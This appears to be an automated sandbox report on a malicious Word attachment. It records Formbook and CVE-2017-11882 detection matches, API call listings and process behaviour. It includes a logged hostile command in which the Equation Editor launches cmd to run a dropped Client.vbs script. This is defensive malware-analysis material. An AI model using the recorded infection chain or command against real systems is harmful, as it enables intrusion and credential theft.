          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\calc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\calc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, type: DROPPEDMatched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about, score =
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00B4E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00B9373B appears 238 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00B93F92 appears 132 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00BBF970 appears 81 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00B4DF5C appears 118 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0234F970 appears 81 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 02323F92 appears 108 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0232373B appears 238 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 022DE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 022DDF5C appears 118 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A360 NtCreateFile,11_2_0041A360
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A410 NtReadFile,11_2_0041A410
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A490 NtClose,11_2_0041A490
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A540 NtAllocateVirtualMemory,11_2_0041A540
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A35A NtReadFile,11_2_0041A35A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A48A NtClose,11_2_0041A48A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B400C4 NtCreateFile,LdrInitializeThunk,11_2_00B400C4
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B40078 NtResumeThread,LdrInitializeThunk,11_2_00B40078
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B40048 NtProtectVirtualMemory,LdrInitializeThunk,11_2_00B40048
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3F9F0 NtClose,LdrInitializeThunk,11_2_00B3F9F0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3F900 NtReadFile,LdrInitializeThunk,11_2_00B3F900
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FAE8 NtQueryInformationProcess,LdrInitializeThunk,11_2_00B3FAE8
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_00B3FAD0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FBB8 NtQueryInformationToken,LdrInitializeThunk,11_2_00B3FBB8
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FB68 NtFreeVirtualMemory,LdrInitializeThunk,11_2_00B3FB68
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FC90 NtUnmapViewOfSection,LdrInitializeThunk,11_2_00B3FC90
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FC60 NtMapViewOfSection,LdrInitializeThunk,11_2_00B3FC60
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FD8C NtDelayExecution,LdrInitializeThunk,11_2_00B3FD8C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FDC0 NtQuerySystemInformation,LdrInitializeThunk,11_2_00B3FDC0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FEA0 NtReadVirtualMemory,LdrInitializeThunk,11_2_00B3FEA0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_00B3FED0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FFB4 NtCreateSection,LdrInitializeThunk,11_2_00B3FFB4
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B410D0 NtOpenProcessToken,11_2_00B410D0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B40060 NtQuerySection,11_2_00B40060
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B401D4 NtSetValueKey,11_2_00B401D4
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B4010C NtOpenDirectoryObject,11_2_00B4010C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B41148 NtOpenThread,11_2_00B41148
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B407AC NtCreateMutant,11_2_00B407AC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3F8CC NtWaitForSingleObject,11_2_00B3F8CC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B41930 NtSetContextThread,11_2_00B41930
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3F938 NtWriteFile,11_2_00B3F938
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FAB8 NtQueryValueKey,11_2_00B3FAB8
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FA20 NtQueryInformationFile,11_2_00B3FA20
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FA50 NtEnumerateValueKey,11_2_00B3FA50
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FBE8 NtQueryVirtualMemory,11_2_00B3FBE8
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FB50 NtCreateKey,11_2_00B3FB50
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FC30 NtOpenProcess,11_2_00B3FC30
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B40C40 NtGetContextThread,11_2_00B40C40
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FC48 NtSetInformationFile,11_2_00B3FC48
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B41D80 NtSuspendThread,11_2_00B41D80
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FD5C NtEnumerateKey,11_2_00B3FD5C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FE24 NtWriteVirtualMemory,11_2_00B3FE24
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FFFC NtCreateProcessEx,11_2_00B3FFFC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FF34 NtQueueApcThread,11_2_00B3FF34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D00C4 NtCreateFile,LdrInitializeThunk,13_2_022D00C4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D07AC NtCreateMutant,LdrInitializeThunk,13_2_022D07AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFAB8 NtQueryValueKey,LdrInitializeThunk,13_2_022CFAB8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFAE8 NtQueryInformationProcess,LdrInitializeThunk,13_2_022CFAE8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_022CFAD0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFB68 NtFreeVirtualMemory,LdrInitializeThunk,13_2_022CFB68
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFB50 NtCreateKey,LdrInitializeThunk,13_2_022CFB50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFBB8 NtQueryInformationToken,LdrInitializeThunk,13_2_022CFBB8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CF900 NtReadFile,LdrInitializeThunk,13_2_022CF900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CF9F0 NtClose,LdrInitializeThunk,13_2_022CF9F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_022CFED0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFFB4 NtCreateSection,LdrInitializeThunk,13_2_022CFFB4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFC60 NtMapViewOfSection,LdrInitializeThunk,13_2_022CFC60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFD8C NtDelayExecution,LdrInitializeThunk,13_2_022CFD8C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFDC0 NtQuerySystemInformation,LdrInitializeThunk,13_2_022CFDC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D0060 NtQuerySection,13_2_022D0060
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D0078 NtResumeThread,13_2_022D0078
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D0048 NtProtectVirtualMemory,13_2_022D0048
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D10D0 NtOpenProcessToken,13_2_022D10D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D010C NtOpenDirectoryObject,13_2_022D010C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D1148 NtOpenThread,13_2_022D1148
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D01D4 NtSetValueKey,13_2_022D01D4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFA20 NtQueryInformationFile,13_2_022CFA20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFA50 NtEnumerateValueKey,13_2_022CFA50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFBE8 NtQueryVirtualMemory,13_2_022CFBE8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CF8CC NtWaitForSingleObject,13_2_022CF8CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CF938 NtWriteFile,13_2_022CF938
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D1930 NtSetContextThread,13_2_022D1930
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFE24 NtWriteVirtualMemory,13_2_022CFE24
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFEA0 NtReadVirtualMemory,13_2_022CFEA0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFF34 NtQueueApcThread,13_2_022CFF34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFFFC NtCreateProcessEx,13_2_022CFFFC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFC30 NtOpenProcess,13_2_022CFC30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFC48 NtSetInformationFile,13_2_022CFC48
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D0C40 NtGetContextThread,13_2_022D0C40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFC90 NtUnmapViewOfSection,13_2_022CFC90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFD5C NtEnumerateKey,13_2_022CFD5C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D1D80 NtSuspendThread,13_2_022D1D80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008A360 NtCreateFile,13_2_0008A360
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008A410 NtReadFile,13_2_0008A410
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008A490 NtClose,13_2_0008A490
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008A540 NtAllocateVirtualMemory,13_2_0008A540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008A35A NtReadFile,13_2_0008A35A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008A48A NtClose,13_2_0008A48A
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drOLE indicator has summary info: false
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$Q-CIF DT22.docJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@12/12@5/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B82CB9 FormatMessageW,SysAllocString,LocalFree,LocalFree,GetLastError,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,FormatMessageA,MultiByteToWideChar,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,LocalFree,13_2_00B82CB9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B93F69 LoadResource,13_2_00B93F69
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
          Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drOLE document summary: edited time not present or 0
          Source: RFQ-CIF DT22.docVirustotal: Detection: 25%
          Source: RFQ-CIF DT22.docReversingLabs: Detection: 15%
          Source: C:\Windows\SysWOW64\cscript.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeConsole Write: .................................3].....(.P.....l.......8...............b.........................................................$.......$.....Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............................................`I.........v.....................K..............j.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............Y..k......9.............................}..v....`.9.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0.2.............}..v....p.9.....0.......................$.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............Y..k....(.9.............................}..v......9.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;..................k.... ...............................}..v....p.9.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............Y..k....(.9.............................}..v......9.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G..................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S..................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._..................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k..................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w..................k.... ...............................}..v....p!:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............Y..k....(":.............................}..v.....":.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p):.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(*:.............................}..v.....*:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p1:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(2:.............................}..v.....2:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p9:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(::.............................}..v.....::.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....pA:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(B:.............................}..v.....B:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....pI:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(J:.............................}..v.....J:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....pQ:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(R:.............................}..v.....R:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....pY:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(Z:.............................}..v.....Z:.....0...............x...............................Jump to behavior
